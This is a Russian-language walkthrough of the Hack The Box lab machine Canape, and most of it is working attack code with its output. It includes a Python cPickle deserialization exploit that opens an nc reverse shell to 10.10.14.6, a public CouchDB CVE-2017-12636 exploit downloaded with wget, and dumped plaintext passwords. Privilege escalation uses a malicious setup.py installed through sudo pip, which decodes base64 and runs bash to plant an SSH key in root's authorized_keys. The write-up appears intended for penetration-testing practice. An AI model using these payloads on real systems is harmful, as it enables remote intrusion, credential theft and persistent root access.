Обзор сервисов
$ sudo nmap -sC -sV -sT -Pn -p- -v -oN nmap 10.10.10.70
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 3FED5FB44C411733402A1C8C01E49994
| http-git:
| 10.10.10.70:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: final # Please enter the commit message for your changes. Li...
| Remotes:
|_ http://git.canape.htb/simpsons.git
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Simpsons Fan Site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
| 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.10.70/.git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://git.canape.htb/simpsons.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
Добавим 10.10.10.70 git.canape.htb canape.htb
в /etc/hosts
.
Git
$ git clone http://git.canape.htb/simpsons.git
$ cd simpsons
$ cat __init__.py
...
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]
Exploit
Кастомный CPickle exploit.py
import requests
import hashlib
import cPickle
import os
class Test(object):
def __reduce__(self):
return (os.system,("homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f",))
character, quote = cPickle.dumps(Test()).split("!")
p_id = hashlib.md5(character + quote).hexdigest()
requests.post("http://10.10.10.70/submit", data={"character": character, "quote": quote})
requests.post("http://10.10.10.70/check", data={"id": p_id})
nc -lnvp 1234
python exp.py
CouchDB
Couchdb запущен от имени пользователя homer
:
Публичный эксплоит
wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py
Загрузим его в /tmp/exp.py
и модифицируем IP-адрес. Запускаем:
python3 exp.py
wooyun:wooyun
- этот пользователь будет иметь админские права в CouchDB после выполнения скрипта.
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/_all_docs --user 'wooyun:wooyun'
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}
Флаг пользователя
$ ssh [email protected] -p 65535
0B4jyA0xtytZi7esBNGp
homer@canape:~$ cat user.txt
bce918696f293e62b2321703bb27288d
Повышение привилегий
homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User homer may run the following commands on canape:
(root) /usr/bin/pip install *
mkdir /tmp/t
cd /tmp/t
nano setup.py
from setuptools import setup
from setuptools.command.install import install
import base64
import os
class CustomInstall(install):
def run(self):
install.run(self)
reverse_shell = 'mkdir /root/.ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtRShyvgwXRSQCdJxVHSOmsvH1gbQMXAuUYSs0abix0cynMoPGfWCO9GE9nF6gSvcrvcu5L6aLnOFkot147K8uys3BCGRyeUpkdf+3ulecAHJCvMRymEr0dUzxu+1KTINPrxNtDOf7sLRPIr0pKql7Roi4LQ4SuFuB2Rm+LUaQvjSYbogt+gtEYEOHlfetJC/4XthYcmFi4jQdA9DEva07LIlmIsr/CmtLFZ40/zSKcv88OFXAUW86+82KOR/LcV65TDQ4uXyF72d6R5pmXods7EP3WqdFxsIHq0rGPJPitSSIGzWsYF0k5NdN4i+990OBUi3dHaFHy9F6TVLPR7tQMj6zaSBp4gPnCCsFebLnfuv3tN4gOL7CS21bJS7HYaTa3ApGN+onUyCn7NK0JXpNpm9YUu43IVwNRA6Z6E20hVfbxhEYQLB1PhhfF6DPQ/b4NI8fch1zGV3uL0qK8XL7K8zKsYOgWTffmH2s/kh724HuI2jUxBiJ3RH171cRxnU= kali@kalihackthebox >> /root/.ssh/authorized_keys'
encoded = base64.b64encode(reverse_shell)
os.system('echo %s|base64 -d|bash' % encoded)
setup(name='FakePip',
version='0.0.1',
description='This will exploit a sudoer able to /usr/bin/pip install *',
url='https://github.com/0x00-0x00/fakepip',
author='zc00l',
author_email='[email protected]',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
sudo -H /usr/bin/pip install . --upgrade --force-reinstall
Флаг суперпользователя
$ ssh [email protected] -p 65535
root@canape:~# ls
root.txt
root@canape:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:80:86 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.70/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
root@canape:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canape:~# cat root.txt
928c3df1a12d7f67d2e8c2937120976d